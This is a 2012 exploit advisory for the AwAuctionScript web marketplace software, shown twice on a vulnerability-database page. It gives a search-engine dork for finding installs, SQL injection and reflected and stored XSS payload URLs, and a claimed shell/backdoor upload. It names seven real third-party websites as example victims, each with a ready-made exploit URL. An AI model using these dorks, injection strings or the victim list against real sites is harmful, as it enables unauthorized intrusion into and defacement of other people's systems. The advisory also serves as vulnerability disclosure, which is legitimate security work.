Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28740
HistoryNov 06, 2012 - 12:00 a.m.

AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities

2012-11-0600:00:00
vulners.com
330
JSON

==========================================================================================
AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities
: # Date : 04 November 2012
: # Author : X-Cisadane
: # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS

inurl:/listing.php?category=Website

Proof of Concept

SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL]
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1

Example :
http://www.domaingang.net/listing.php?category=Website&amp;PageNo=-1
http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&amp;PageNo=-1
http://buyandsellwebsite.org/listing.php?category=Website&amp;PageNo=-1
http://www.santinet.net/offers/listing.php?category=Website&amp;PageNo=-1
http://nomclub.com/listing.php?category=Website&amp;PageNo=-1
http://websiterama.com/listing.php?category=Website&amp;PageNo=-1
http://www.flipitmarketplace.com/listing.php?category=Website&amp;PageNo=-1

XSS (Non Persistent)

  • On the Admin Login page (Tested on Firefox)
    Fill username with : "><script>alert(/xss/)</script> and the password with anything.

Example : http://buyandsellwebsite.org/admin/
PIC : http://i50.tinypic.com/i20own.png

  • On Listing Page (Tested on Firefox)
    http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script]

Example : http://buyandsellwebsite.org/listing.php?category=&lt;script&gt;alert&#40;/x-cisadane/&#41;&lt;/script&gt;
PIC : http://i46.tinypic.com/dwqip0.png

XSS (Persistent)
*Must be logged in
http://victim site/<path>/sell-your-site.php

Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php

PIC : http://i49.tinypic.com/20qz0x1.png

Upload Shell/Backdoor :
Example (Victim/Target) : http://websiterama.com/

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss…!

awauction.txt

==========================================================================================
AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities
: # Date : 04 November 2012
: # Author : X-Cisadane
: # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS

inurl:/listing.php?category=Website

Proof of Concept

SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL]
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1

Example :
http://www.domaingang.net/listing.php?category=Website&amp;PageNo=-1
http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&amp;PageNo=-1
http://buyandsellwebsite.org/listing.php?category=Website&amp;PageNo=-1
http://www.santinet.net/offers/listing.php?category=Website&amp;PageNo=-1
http://nomclub.com/listing.php?category=Website&amp;PageNo=-1
http://websiterama.com/listing.php?category=Website&amp;PageNo=-1
http://www.flipitmarketplace.com/listing.php?category=Website&amp;PageNo=-1

XSS (Non Persistent)

  • On the Admin Login page (Tested on Firefox)
    Fill username with : "><script>alert(/xss/)</script> and the password with anything.

Example : http://buyandsellwebsite.org/admin/
PIC : http://i50.tinypic.com/i20own.png

  • On Listing Page (Tested on Firefox)
    http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script]

Example : http://buyandsellwebsite.org/listing.php?category=&lt;script&gt;alert&#40;/x-cisadane/&#41;&lt;/script&gt;
PIC : http://i46.tinypic.com/dwqip0.png

XSS (Persistent)
*Must be logged in
http://victim site/<path>/sell-your-site.php

Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php

PIC : http://i49.tinypic.com/20qz0x1.png

Upload Shell/Backdoor :
Example (Victim/Target) : http://websiterama.com/

JSON